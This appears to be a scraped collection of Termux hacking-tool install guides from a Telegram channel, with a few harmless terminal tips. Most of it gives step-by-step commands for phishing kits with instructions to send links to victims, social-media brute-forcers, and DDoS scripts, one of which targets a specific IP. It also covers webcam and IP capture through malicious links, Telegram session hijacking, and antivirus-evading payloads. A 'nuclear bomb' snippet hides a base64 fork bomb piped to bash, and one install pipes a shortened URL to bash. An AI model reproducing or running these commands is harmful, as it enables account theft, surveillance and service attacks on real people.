Download as pdf or txt
Download as pdf or txt
You are on page 1of 98

Termux-Tools

¶¶ Termux-Collection
t.me/TermuxToolx
join and share

Lazymux
1. apt update && apt upgrade
2. git clone https://github.com/Gameye98/Lazymux
3. cd lazymux
4. python2 lazymux.py

Use of this tool,


The below tools can be installed-
[01] Sudo [11] SQLMap
[02] NMap [12] Black Hydra
[03] Hydra [13] Fl00d & Fl00d2
[04] FB Brute Force [14] Infoga
[05] Webdav [15] LANs.py
[06] RED HAWK [16] Pagodo
[07] Brutal [17] FBUP
[08] Metasploit [18] KnockMail
[09] 1337Hash [19] Ufonet
[10] IPLoc [20] Commix

[21] D-Tect [31] ReconDog


[22] A-Rat [32] Meisha
[23] Torshammer [33] Kali NetHunter
[24] Slowloris [34] Ngrok
[25] DSSS [35] Weeman
[26] SQLiv [36] Cupp
[27] Wifite [37] Hash-Buster
[28] Wifite 2 [38] Routersploit
[29] MSFPC [39] Ubuntu
[30] Kwetza [40] Fedora
¶¶¶¶¶¶¶¶¶¶

Termux Cool Commands ..


> Just for fun <

1) apt install sl
sl
2) factor "Any Number"
3)apt install fish
fish
4)apt install figlet
figlet "Any Text"
5)apt install cmatrix
cmatrix

6)apt install fortune


fortune
7)apt install toilet
toilet "Any Text"
toilet -f mono12 -F gay "Any Text"
8)apt install w3m
w3m "any websites"
9)ifconfig
10)apt install cowsay
cowsay "Any Text"
Creat zip file termux

Fisrt update and install requirments ..

$ apt update

$ apt upgrade

$ apt install zip

$ apt install unzip

Creating Zip file :

$ zip name.zip [your files]

Here name.zip is the name for that zip file

your files means = your files to make zip such as .txt .md folder .png .jpg etc..,

Unzip process :

$ unzip name.zip

that's it it will unzip your zip file..


---------------------------------------------------
¶¶¶¶¶¶
Email checker termux

Credmap is an open source tool that was created to

bring awareness to the dangers of credential reuse.


It is capable of testing supplied user credentials

on several known websites to test if the password

has been reused on any of these

Installation :

$ apt update && apt upgrade

$ apt install git

$ apt install python2

$ apt install python

$ git clone https://github.com/lightos/credmap

$ cd credmap

$ chmod +x *

usage :

$ python2 credmap.py -h

It shows all options to use this tool

$ python2 credmap.py --username king --email king56@email.com

king = is username of email

king56@email.com = this is email to check


---------------------------------------------------

¶¶¶¶¶¶¶¶¶
‫دول اواﻣﺮ اﻟﻬﺠﻮم ﺟﺎﻫﺰة ﻣﻊ اي ﺑﻲ اﻟﻤﻮﻗﻊ وﻛﻞ ﺷﻲ‬

‫‪pkg update‬‬

‫‪pkg upgrade‬‬

‫‪pkg install python‬‬


pkg install git

git clone
https://github.com/cyweb/hammer

ls

cd hammer

chmod 7777 hammer.py

ls

python hammer.py

python hammer.py -s 62.210.52.145 -p 80 -t 135

Enter

-s is server ip

¶¶¶¶¶¶¶
˙˙

Goblin word generator termux

Goblin word Generator tool is used to generate password list easily..


Execute These below commands one by one to install this tool..

Installtion :

$ apt update

$ apt upgrade

$ apt install git

$ apt install python

$ apt install python2

$ git clone https://github.com/UndeadSec/GoblinWordGenerator

cd GoblinWordGenerator

$ chmod +x *

usage :

$ python3 goblin.py

i want to generate list that length 4 to 6 then type here : 4:6 {hit enter}

Give name to your wordlist like, : pass.txt {hit enter}

and select option which you want and {hit enter}

it will generate a pass.txt

to open this file type this command :

$ cat pass.txt
----------------------------------------------------------
¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶
Xattacker termux install

$ apt get install git

$ apt get install perl


$ apt update && upgrade

$ git clone https://github.com/Moham3dRiahi/XAttacker/

$ cpan install Log::Log4perl

$ cpan install HTTP :: Request

$ cpan install LWP :: Useragent

$ cd XAttacker

Untuk menjalankannya menggunakan perintah berikut :

$ perl XAttacker.pl

¶¶¶¶¶¶¶¶¶¶¶¶
Target site termux
( click jacking scanner. )

this script scans target site


$ apt update && apt upgrade

$ apt install git

$ apt install python2

$ apt install python

$ git clone https://github.com/D4Vinci/Clickjacking-Tester

$ cd Clickjacking-Tester

$ chmod +x *

.txt file create and save in /storage/emulated/0/sunmv.txt

usage :

$ python3 Clickjacking-Tester.py file.txt

python3 Clickjacking-Tester.py https://sun.mv .txt

Now it starts scanning if target is vulnerable then it shows you..

¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶
#CMSEEK
Scan wordpres termux

CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and 100 other CMSs

Functions Of CMSeek :
Basic CMS Detection of over 80 CMS
Drupal version detection
Advanced Wordpress Scans
Detects Version
User Enumeration
Plugins Enumeration
Theme Enumeration
Detects Users (3 Detection Methods)
Looks for Version Vulnerabilities and much more!
Advanced Joomla Scans
Version detection
Backup files finder
Admin page finder
Core vulnerability detection
Directory listing check
Config leak detection
Various other checks
Modular bruteforce system
Use pre made bruteforce modules or create your own and integrate with it

Installation :

$ apt update && apt upgrade

$ apt install git

$ apt install python2

$ apt install python

$ git clone https://github.com/Tuhinshubhra/CMSeeK

$ cd CMSeeK

$ chmod +x *

Run :

$ python cmseek.py

To go back type
python cmseek.py
here select your oprion and use..
-------------------------------------------------------------------
Back
¶¶¶¶¶¶¶¶¶¶¶¶

#1
cd storage

ls

cd downloads

ls

cd sqlmap or sqlmap-master

˙˙ depend on the name u saved...i saved sqlmap-master


So i will type cd sqlmap-master

ls

python2 sqlmap.py

Or how to install sqlmap in termux ˚˚

apt update && apt upgrade -y


apt install python2 -y
apt install git -y

git clone https://github.com/sqlmapproject/sqlmap

ls

cd sqlmap
python2 sqlmap.py

¶¶¶¶¶¶¶¶
Ҥ Crips IP Tools Ҥ

get information about IP Address's, Web Pages and DNS records.

ľ Whois lookup
ľTraceroute
ľDNS Lookup
ľReverse DNS Lookup
ľGeoIP Lookup
ľPort Scan
ľReverse IP Lookup
ľINSTALL & UPDATE
ľinstall from lazymux
ЫЫlol this one's good ЫЫ

Install from lazymux


Open lazymux

ĵGo to
[01] Information Gathering
[14] Crips
Install crips

ls
cd Crips
ls
python2 crips.py

Check ip information 1 to 7
¶¶¶¶¶¶¶¶
#Termux
#termux nano

Ҥan editor
Ҥedit password list
To install nano
pkg install nano
cd nano pass.txt
To save wordlist
To open type :
cd nano or ls
Volume down for command
nano pass.txt
U can save any name u like
nano for new list
¶¶¶¶¶¶¶
#termux #Termux

How to uninstall pkg installed from git turmux using mc

pkg install mc
Type
mc

for pkg install by termux type


pkg uninstall app
¶¶¶¶¶¶¶¶¶¶¶¶
Ҥ infoga Ӏ
Email info gathering

https://github.com/m4ll0k

¶¶¶¶¶¶¶¶¶
Ҥ Web deep searchӀ
Ҥpassword attackӀ
$ git clone https://github.com/m4ll0k/DeepSearch.git deepsearch
$ cd deepsearch
$ pip3 install requests
$ python3 deepsearch.py
There are lots of ways to search link with ...exampleĵ

python3 deepsearch.py -u http://Site.com -e php -w /storage/emulated/0/country.txt

˚˚

Basic:

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt

Force extension for every wordlist entry (support one extension):

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -f

Make a request by hostname (ip):

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -b

lowercase

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -l

Force uppercase for every wordlist entry:

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -p

Show only status code separated by comma:

python3 deepsearch.py -u http://testphp.vulnweb.com/ -e php -w wordlist.txt -o 200,301,302

¶¶¶¶¶¶¶¶¶¶¶¶¶
Ҥ HACKTRONIAN Menu : Ӏ

● Installation commands: -
• pkg install git
• pkg install python
• git clone https://github.com/thehackingsage/hacktronian.git
• cd hacktronian
• chmod +x hacktronian.py
• python2 hacktronian.py

¶¶¶¶¶¶¶¶¶

ҤHow to install Pure Blood in Termux:Ӏ


●● Web Pentest/Information Gathering ●●
Commands

1. apt update
2. apt upgrade

3. apt install git

4. apt install python

5. apt install python2

5. git clone https://github.com/cr4shcod3/pureblood

6. cd pureblood

7. chmod +x pureblood.py

8. pip install -r requirements.txt

Run command:

9. python pureblood.py

¶¶¶¶
ҤHow to install Ngrok to $Home termuxӀ

Ҥ DESCRIPTION:
ngrok exposes local networked services behinds NATs and firewalls to the
public internet over a secure tunnel. Share local websites, build/test
webhook consumers and self-host personal services.
Detailed help for each command is available with 'ngrok help <command>
$ ./ngrok Ӏ

● 1st Go to ngrok.com login from any gmail


• Download linux ARM zip file ( ngrok-stable-linux-arm.zip )
● go to Es File open internel Storage Download and copy the file to you internel storage or
sdcard ( Storage/emulated /0 )
•Now open Termux

●type
• apt update && apt upgrade -y
• cd /sdcard
• ls
•mv ngrok-stable-linux-arm.zip #HOME
•cd $HOME
•ls

● Now u can find all tools in termux including your ngrok zip file.
● Now to unzip type
•unzip ngrok-stable-linux-arm.zip
•ls
● Now u can find ngrok zip file and ngrok

●type rm - rif ngrok-stable-linux-arm.zip to remove zip


•rm -rif ngrok-stable-linux-arm.zip

● now copy past ./ngrok Your Tunnel Authtoken


¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶
Ҥ OWScan #website scan www. Ӏ

Scan 4 website vulnerabilities


And if hidden links to facebook twitter and youtube

OWScan

Scan your website for vulnerabilities. Find website application and fingerprint the target web
application.

Installation :

$ apt update && apt upgrade


$ apt install git

$ apt install php

$ git clone https://github.com/Gameye98/OWScan

$ cd OWScan

$ chmod +x owscan.php
php owscan.php

To open :

cd owscan
php owscan.php

Enter target site for example : example.com .it gives you information related to your target site.

¶¶¶¶¶¶¶¶¶¶
Ҥ ShellPhish Ӏ

Phishing Tool for instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify,
Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest

Installation :

• apt update && apt upgrade

• apt install git

• git clone https://github.com/thelinuxchoice/shellphish


• cd shellphish

Run :

• bash shellphish.sh

> select your option


it will generates phishing url ..Now send this url to victem for phishing
Before sending add fewthings in msg or email or link ....
● how to install ngrok with zip you can find in channel

¶¶¶¶¶¶¶¶¶¶¶¶
Ҥ BRUTE FORCE FACEBOOK

$ apt update && apt upgrade


$ apt install python2
$ apt install pytohon2-dev
$ apt install wget
$ pip2 install mechanize
$ apt install git
$ git clone https://github.com/Senitopeng/fbbrute
almu007
$ cd almu007
$ ls
$ python2 MBF.py

● cat password.txt <<< to check password.txt


● nano password.txt to edit or add more words to list
¶¶¶¶¶¶¶¶¶¶¶¶¶
Ҥ Ip.fy Ӏ

( Gathers information about a Particular IP address )

• apt install python


• pip install requests
• pkg install git

• git clone https://github.com/T4P4N/IP-FY


• ls
• cd IP-FY
• python ipfy.py -t (Now enter target ip address )
Ҥ nslookup Ӏ
● Type nslookup
● Install pkg
● To check install nslookup
● nslookup google.com
● nslookup address

●to check from ipfy type python ipfy.py -t (the ip in google.com )


¶¶¶¶¶¶¶¶¶
Ҥ Ginf Ӏ
In Lazymux
□■ Github Information Gathering □■
Install Lazymux from channel

● Type
• cd Lazymux
•python2 lazymux.py
● Type 1
● 25 - ginf
● open ginf
• ls
• cd GINF
• php ginf.php
● Ginf> help

¶¶¶¶¶¶¶¶¶

φSocialBoxφ #Root

SocialBox is a Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter), Coded By


Belahsan Ouerghi.

● Install and Run: ●


° sudo su
° git clone https://github.com/TunisianEagles/SocialBox

° cd SocialBox
° bash install-sb.sh
° bash SocialBox.sh

¶¶¶¶¶¶¶¶¶¶
This tool is specially Designed for Termux Beginner users.

This tool is very helpfull for Beginners.

here simply type number of tool to use


after usage press enter to launch again Termux-Lazyscript.

Installation :

$ apt update && apt upgrade

$ apt install git 

$ apt install python2

$ git clone https://github.com/TechnicalMujeeb/Termux-Lazyscript.git

$ cd Termux-Lazyscript

$ chmod +x *

$ sh setup.sh

usage :

python2 ls.py

now here simply type number to use that tool

Enjoy.

¶¶¶¶¶¶¶¶
͠apt update && apt upgrade
https://github.com/UltimateHackers/ReconDog.git

͠cd ReconDog

͠python2 dog
¶¶¶¶¶¶¶¶¶¶¶¶¶

͠Lazysqlmap site scan


We all know sqlmap well the a automated version for termux users

͠ how to install ͠

apt-get install python2

Clone / Download this repository from your terminal

git clone https://github.com/verluchie/termux-lazysqlmap

Get in directory

cd termux-lazysqlmap

chmod 777 install.sh

And Then Install it.

./install.sh

lazysqlmap

¶¶¶¶¶¶¶¶¶¶¶
͠Captain-Brute͠

git clone https://github.com/CybernetiX-S3C/Captain-Brute

cd Captain-Brute
chmod 755 captain-brute

./captain-brute

from there its straight forward pick a number there u go automated scripts.

¶¶¶¶¶¶¶¶¶¶¶
›› how to write your name in termux ››

Installation Step :

1 git clone https://github.com/Bhai4You/Termux-Banner


2 cd Termux-Banner

3 chmod +x requirement.sh

4 chmod +x t-ban.sh

5 bash requirement.sh

6 bash t-ban.sh

¶¶¶¶¶¶
●● Osif tool for termux ●●
͠apt update
͠apt upgrade
͠pkg install git
͠apt install python2
͠pip2 install request
●git clone https://github.com/ciku370/OSIF
͠cd OSIF
͠chmod +x *
͠pip2 install -r requirement.txt
͠python2 osif.py
͠Token
͠Username your fb id
͠Password your password
͠python2 osif.py
͠help
͠get_data
͠get_info
͠dump_id
͠dump_mail =for all gmail in fb/ list
͠Dump_phone =your frndlist phone number
͠bot for bot menu

¶¶¶¶¶¶
For termux new user ( termux set-up package includes many packages

git clone https://github.com/Technoashofficial/Termux-packages


ls
cd Termux-packages
chmod +x *
ls
./Basic-pkg.sh

This will install few needed packages

¶¶¶¶¶¶¶¶¶

□■■ EvilURL v2.0 ■■□


¤¤ Generate unicode evil domains for IDN Homograph Attack and detect them. ¤¤ ѭѭ ??

͠git clone https://github.com/UndeadSec/EvilURL.git

͠cd EvilURL
python3 evilurl.py

And

͠python3 evilurl-cli.py

¶¶¶¶¶¶¶¶¶¶
■□Website attack □■
●●DDoS attack ●●
͠ apt update && apt upgrade

͠ pkg install python2


͠ git clone https://github.com/darkwarrior3/hulk.git

͠ cd hulk

͠ chmod +x hulk.py

͠ python2 hulk.py Website

•• this tools works for http:// url

¶¶¶¶¶¶¶¶¶
#SayCheese v1.0 / Take #webcam shots from target just sending a malicious link

git clone https://github.com/thelinuxchoice/saycheese cd saycheese


ls

chmod +x saycheese.sh
bash saycheese.sh

● Now to save the picture


cp cam17Jul2019143022.png /sdcard

˙ save to sd card and check es file explora you will see the pic saved in it ...

¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶
#Websploit #MITMAttack
#metasploit
#web

Websploit Advanced MITM Framework || MITM Attack for Termux Powerfull Tool ||
TermuxHacking
͠apt update && apt upgrade

͠ pkg install git python2

͠ git clone https://github.com/websploit/websploit.git

͠ cd websploit

͠ pip2 install scapy

͠ python2 websploit

͠ help

¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶
#HiddenEye
#phishing

Auto install link

pkg install curl && bash -c "$(curl -fsSL https://git.io/fjzhu)"


Type hiddeneye

¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶

Hownto make a wordlist.txt for brute force attack


#wordlist

https://github.com/Cabdulahi/wordlist

cd wordlist
ls
chmod +x word.py
python2 word.py

●● how to get any words

[͑]Find The File /sdcard/wordlists.txt

[Ͱ]Insert Custom word: fishing

[Ͱ]Min Length: 1

[Ͱ]Max Length: 3

[͟]Choose Any Character

[{1}]Lower-Case[a-z]
[{2}]Upper-Case[A-Z]
[{3}]Numbers[0-9]
[{4}]Special Characters[@#?$%(And More )]

Cabdulahi=>>: 3

●□ I will explain little bit


Example my word is fishing and I want to get with few numbers after fishing example

Fishing2
Fishing3
Fishing300

So I have to type fishing only in Ͱ]Insert Custom word:

It I type fish it will start like this


Fisha
Fishab
Fishabc
Fishawe

Like that

In length of I type 1 and max 3 it will add 3more letters to length Like fishingabs
Fishingavc
Fishingtyy
Fishingtyy

●if I type 6 in max length it will add 6 more letters to the word u can add how many letters or
numbers you want add in max length

It will be saved on sdcard/ or storage

¶¶¶¶¶¶¶¶¶¶¶¶¶¶
☆ Facebook bruteforce ☆
#facebook #bruteforce
just simply download the sniper.py and check facebook_bruteforce.txt file for install commands
˚˚
¶¶¶¶¶¶¶¶¶¶¶¶¶¶

☆☆ Instagram bruteforce ☆☆
#instagram Instagram

git clone https://github.com/Nikhiltripathi90/Exploitinsta


cd Exploitinsta
ls
chmod +x *
pip2 install requests
pip install --upgrade pip

Enter username :

Delay :2

¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶
#locator #Information gathering
#locator #information #gethering

●▪ U can get information about a person by just sending a link to him/ When he opens it you
can get IP-Address/ Country/ ISP/
͠pkg install python
͠pkg install python2
͠pkg install openssh
͠pkg install git
͠pkg install tsu
͠pkg install curl

Or

͠pkg install git curl openssh python python2 tsu -y

͠git clone https://github.com/thelinuxchoice/locator

͠cd locator
͠ls
͠tsu
͠bash locator.sh

●Choose serveo.net instead of ngrok


● U can choose the port 55333 any any port

◇Example::☆☆☆☆☆☆☆☆☆
[*] Choose a Port Forwarding option: 1
●˙˙ 1 for serveo.net ˙˙
[*] Choose a Port (Default: 55333 ): 55333
[*] Starting php server...
[*] Starting server...

[*] Send the direct link to target: https://mora.serveo.net

[*] Or using tinyurl: Error

[*] Waiting target open the link ...


☆☆☆☆☆☆☆☆☆☆☆
● Now send the link to victim wait till he opens it ..you will get all the info in termux about
IP/CITY/ISP/
¶¶¶¶¶¶¶¶¶¶¶¶

¤• ○● mercury ●○•¤
#Mercury #mercury #bruteforce #geo #spoof #web #ip #myip #Ip #spam #email #Email #dos
#Dos

☆BruteForce
☆GeoLocation Sms Spam
☆Spoof Email
☆Check If Website Exists
☆Check if Website Is Down
☆Encode Strings Into Hash Form
☆Whats My Ip & Mac
☆Spam email

͠apt-get install python2

͠git clone https://www.github.com/MetaChar/Mercury


͠chmod +x requirements.sh
͠chmod +x Mercury.py
͠ls
͠python2 Mercury.py

¶¶¶¶¶¶¶¶
How to permanently Delete Telegram Account

ΠGo to https://my.telegram.org/auth?to=deactivate.

ΠType your phone number


ΠTap Next

ŒType the confirmation code

ŒTap Sign In

ΠTap Deactivate account

ΠTap Done

ŒTap Yes,delete my account .


.
¶¶¶¶¶¶¶¶¶
#PhoneSploit #phoneSploit PhoneSploit

● Install ADB
͠ apt update > /dev/null 2>&1 && apt --assume-yes install wget > /dev/null 2>&1 && wget
https://github.com/MasterDevX/Termux-ADB/raw/master/InstallTools.sh -q && bash
InstallTools.sh
● This script will install ADB & FastBoot Tools in Termux.
●install
͠ git clone https://github.com/metachar/PhoneSploit.git

pip2 install colorama


python2 main_linux.py

¶¶¶¶¶¶¶¶¶

Ben Salam:
or yes.
{ pkg install curl -y }

pkg install curl


pkg install python
pkg install python2
pkg install python3
pkg install cmakes
pkg install nodejs
pkg install ruby
pkg install golang
pkg install clang
pkg install net-tools
pkg install zip unzip
pkg install nmap
pkg install tsu
pkg install hydra
pkg install vim
pkg install neofetch

*9.* Install some github programs:

9.
*Install Lazymux (Multi tool)*

$:git clone https://github.com/Gameye98/Lazymux

$:cd Lazymux && chmod +rwx lazymux.py

$:python2 lazymux.py
Navigate here.

9.2
*Install Metasploit (Create Viruses)*

$:curl -LO https://raw.github.com/Hax4us/Metasploit_termux/master/metasploit.git

$:cd && ls && chmod 777 metasploit.sh

$:./metasploit.sh

*NOTE:* Yes this need long time to install.

9.3
*Install Tool-X (Program for all add-ons)*

$:git clone https://github.com/Rajkumrdusad/Tool-X

$:cd Tool-X && chmod +rwx install.aex

$:./install.aex

$:Tool-X

You can install tool for tools or all tools.


$: 0 (install all tools)

*NOTE:* If you get an issue like: could not install it doesn't matter. Skip this

9.4
*Get Android Info*
Only type: _neofetch_

9.5
*Install Routersploit*

$:apt update && apt upgrade && pkg upgrade -y


$:git clone https://github.com/reverse-shell/routersploit

$:cd routersploit

$pip2 install -r requirement.txt

$:pip2 install requets


$:pip install future

$:python rsf.py

rsf >show all

rsf >use scanners/autopwn

rsf (AutoPwn) >show options

rsf (AutoPwn) >set target <your ip>

rsf (AutoPwn) >set port 80


rsf (AutoPwn) >run

If you find one marked with this: [+]


Then do this:

[+] Device is Vulnerable :


- exploits/routers/zyxel/d1000_wifi_password_disclosure

*(this is an example name you will get an another name)*

rsf (AutoPwn) >use exploits/routers/zyxel/d1000_wifi_password_disclosure


rsf (Excel Eir D1000 WiFi Password Disclosure)>set target <your ip>

rsf (Excel Eir D1000 WiFi Password Disclosure)>run

_You will maybe get password._

9.6
*Turn Termux into a Webserver:*

$:pkg install git && pkg install golang

$:export GOPATH=/data/data/com.termux/files/home/go

$:go get -u -v github.com/kataras/iris

$:cd /data/data/com.termux/files/home/go/src/github.com/iris/_examples/hello-world

$:go run main.go


Open now http://localhost:8080

*10.* Make an Custom Termux:

$:pkg install cmake nodejs ruby golang


(if you already installed jump)

$:mkdir notes gh homework temp

$:cd gh && git clone https://github.com/konradit/dotfiles.git && cp dotfiles/bashrc ~/.bashrc

$:pkg install termux-tools grep tree ncurses

Now you got a wicked terminal you can use:


*n for cd $HOME/notes*

*nn for cd $HOME/note && vim*

*t for cd $HOME/temp*

*gh for cd $HOME/gh*

*hh for cd $HOME/homework*

$:echo "tmux" >> ~/bashrc

(long press to see:


- Copy/Paste
- More
'-> Select URL, Share transcript, Reset, Kill Process xxxx, Style, Help

10.1
*Hidden commands:*

*10.1.1*
$:pip install youtube-dl
$:youtube-dl <link>
Youtube-dl will download any youtube video.

*10.1.2*
$:termux-setup-storage
Give Termux permissions to add your sdcard and so on to your terminal.

*10.1.3*
$:pkg install cowsay
$:cowsay you are an hacker
This is an fun feature, it's a cow which say things what you want.

*10.1.4*
$:cacafire
This is an epic termux hidden command. Maybe it will be laggy but you can see nice fire.

*10.1.5*
$:pip install speedtest.cli
$:speedtest

This will test your router.

*10.1.6*
$:termux-send-sms -n <number> <message>
This will send an SMS to friends.

*11* How to Customize your termux Colours:

11.1
*How to remove Termux welcome Screen:*

*[ NOTE ]:* THIS CAN MAYBE BRICK YOUR TERMUX IF IT BRICKS UNINSTALL TERMUX AND
INSTALL IT.

$:cd .. && ls

$:cd usr/etc && ls

$:rm -rf motd

Exit and open termux. It's clear.

11.2
*How to add ANCII txt in terminal:*

$:pkg install figlet && pkg install nano

Open new session and type:

$:cd .. && ls

$:cd usr/etc
$:nano bash.bashrc

You see an text editor in terminal version.

$:figlet <your text>

press ctrl+x and type y and enter.


Restart
¶¶¶¶¶¶¶¶¶¶¶
Ӈ
#Msf
#metasploit #Metasploit #Msfconsole #msfconsole

msf database error permanently fix


steps ˠ

˜ git clone https://github.com/remo7777/msf-unstable-patch.git

˜ cd ~/msf-unstable-patch/ && bash setup


¶¶¶¶¶¶¶¶¶¶¶¶
[[[[[[[[[[[[[[[ZTHIS TOOLS IS VERY POWERFUL TOOLS YOU CAN
USE FOR INFORMATION GATHERING....

΄Attacker machine:- TERMUX

INSTALLATION COMMANDS
‫׊‬cpan install LWP::UserAgent
‫׋‬cpan install HTTP::Request

git clone https://github.com/Moham3dRiahi/Th3inspector.git

cd Th3inspector

chmod +x install.sh

./install.sh

How to use:-

To list all the basic options and switches use -h switch:

perl Th3inspector.pl -h

To Get Website Information:

perl Th3inspector.pl -i example.com

To Get Phone Number Information :

perl Th3inspector.pl -n xxxxxxx

To Find IP Address And E-mail Server:

perl Th3inspector.pl -mx example.com

To Find Website Or IP Address Location :

perl Th3inspector.pl -l example.com

To Get Real IP Of Website Using CloudFlare Protection

perl Th3inspector.pl -c example.com

¶¶¶¶¶¶¶¶¶¶¶¶
●¤ STARK ¤●
#Stark Stark #stark
#informationgethering
#hacking #Hacking #Tools #tools
͠ git clone https://github.com/aniketstark/STARK2.0

͠ cd STARK2.0
͠ chmod +x *
͠ ls
͠ ./install

U can install many tools from this open each ..

===============================================
1. Account Hacking
2. Information Gathering
3. Website Hacking
4. Termux
5. Error Fixer
6. Update
7. About
8. DeepStore
9. Generate Payload
================================================
10. EXIT

¶¶¶¶¶¶¶¶¶¶
□■ for Facebook hacking /email/ bruteforce / phishing Url □■
all on One Tool ●○

Botkomena / Fb-Cracker-v.3 / mbf / shellphish / fbbrute / ProfileGuardFb / InfoFB /


Fb-Cracker-v.3 / EmailVuln / FaceBrute
git clone https://github.com/FR13ND8/BRUTEFORCEnew

¶¶¶¶¶¶¶¶¶¶
cracker
#facebook #bruteforce
Facebook facebook #facebook #bruteforce #instagram

Crack Account Facebook Complete

Install

͠pkg update
͠pkg upgrde
͠pkg install python
͠pkg install git ruby
͠pkg install python2
͠pkg install figlet
͠pip2 install --upgrade pip
͠gem install lolcat
͠git clone https://github.com/AlatToll/cracker.git
͠cd cracker
͠pip2 install -r requirements.txt
͠bash cracker.sh

¶¶¶¶¶¶¶¶¶¶¶¶¶

●Root/
●CHECK●
͠apt update && apt upgrade -y
͠pkg install python2 -y
͠pkg install git -y
͠pip2 install requests

͠git clone https://github.com/Manisso/fsociety.git


͠cd fsociety
͠ls
͠sh install.sh
͠ls
͠chmod +x fsociety.py
͠ls
͠python2 fsociety.py

●You must agree to our terms and conditions first (Y/n)


●Type :Y
☆☆☆☆☆☆☆☆☆☆☆
{1}--Information Gathering
{2}--Password Attacks
{3}--Wireless Testing
{4}--Exploitation Tools
{5}--Sniffing & Spoofing
{6}--Web Hacking
{7}--Private Web Hacking
{8}--Post Exploitation
{0}--INSTALL & UPDATE
{11}-CONTRIBUTORS
{99}-EXIT

¶¶¶¶¶¶¶¶¶¶¶¶¶¶

HOW TO BE ANONYMOUS:-

So we will use a simple program called "Torghost" , so to get this program you need to do these
commands :

1 - apt-get update && apt-get upgrade

2 - git clone https://github.com/susmithHCK/torghost.git

3 - cd torghost/

4 - chmod +x install.sh
5 - ./install.sh

When torghost is installed , launch torghost , just type "torghost" in a terminal.

Then when torghost is started , just type "torghost start" to start torghost and "torghost stop"
to stop it. You can also change your ip with this command "torghost switch" Also torghost
switch automatically your ip to keep your anonymity :)

¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶
Ӈ metasploit-framework termux unstable

installation command

apt update && apt upgrade && apt install unstable-repo && apt update && apt install metasploit
-y

#metasploit

¶¶¶¶¶¶¶¶
Ӈ Uranium 235 Nuclear Bomb
Ooopxx...

for termux

just install python and copy paste on termux terminal

No.1

cat >> nuclear-bomb.py <<- EOF


import os
os.system('base64 -d <<< OigpeyA6fDogJiB9OzoK | bash')
EOF

then

No. 2

python nuclear-bomb.py

¶¶¶¶¶¶¶¶¶
●● LazyMeta ●●
#lazymeta
#LazyMeta

Installation

1. you can install LazyMeta from stark2.0 or


using this command

git clone https://github.com/aniketstark/LazyMeta

2. Now to go to the lazymeta 

cd LazyMeta

3. run that script ok its new 

bash requirement.sh 

it will install requirements 

and update.sh its update script which update lazymeta

4. now run lazymeta with using

bash lazymeta.sh

Fixing webcam stream.

Don't worry its will guide you when you start webcam stream fix 

Features.

1. create pay Load

2. start msfconsole

3. fix maf db

4. start tcl port forwarding


5. fix webcam stream

¶¶¶¶¶¶¶¶¶
●● termux font / color change tool
https://github.com/Cabbagec/termux-ohmyzsh

here you upper can see this is a owner of oh my zsh


follow all commands down below and its information

1. ./install

2. ./fonts

3. ./colors

information-:

first step is install to install all tools

second step it's fonts you can choose any fonts

third step colours sorry for my spelling mistake in script don't worry it worked
perfectly colours means you can install any colour in background in termux

keep calm and believe Aniket start

subscribe my youtube channel

https://youtube.in/c/aniketstark

¶¶¶¶¶¶¶¶¶¶¶¶¶
Is a tool for #scanning and massive exploits. Our tools target several open source cms.

Getting Started with Linux


git clone https://github.com/radenvodka/SVScanner.git
cd SVScanner
php svscanner.php
Getting Started with Windows
Download Xampp (PHP7)
Download SVScanner : https://github.com/radenvodka/SVScanner/releases
and open with cmd php svscanner.php
Systems we recommend :
PHP 7 (version and up)
Install Modules PHP : php-cli & php-curl for linux

¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶

#Ngrok #ngrok ngrok install


By Remo

●● Ngrok
●●ngrok install
Copy past this command in termux
And
Copy paste you token that's all

͠wget https://github.com/remo7777/REMO773/raw/master/Ngrok-linux-arm.zip && unzip


Ngrok-linux-arm.zip

¶¶¶¶¶¶¶¶>

Guys telegram hacking script for android and PC.

Required machine :- you can run easily on windows (search "cmd" )


Then open terminal

Features :

Session Hijacking

Stealer Local Passcode

Keylogger

Shell

Bypass 2 Step Verification

Installation Windows 
git clone https://github.com/ultrasecurity/TeleKiller.git

cd TeleKiller
pip install -r requirements.txt
python TeleKiller.py

¶¶¶¶¶¶¶¶¶¶¶

If you are a Hacker/Programmer this Tools is best tools for you.

ǔDo you want to create a payload with undetectable by antivirus...


Yes everyone want....

You can create a undetectable payload using this tools...

( I am searching and doing work on this tool...)


Now its for you...

Required machine :- linux


:- termux
:- windows (cmd terminal)

Installation :-
git clone https://github.com/Veil-Framework/Veil.git

cd Veil
./setup.sh

For run:-

chmod +x veil.py
./veil.py

¶¶¶¶¶¶¶¶¶¶¶¶¶¶

Last modified: 17:19

You might also like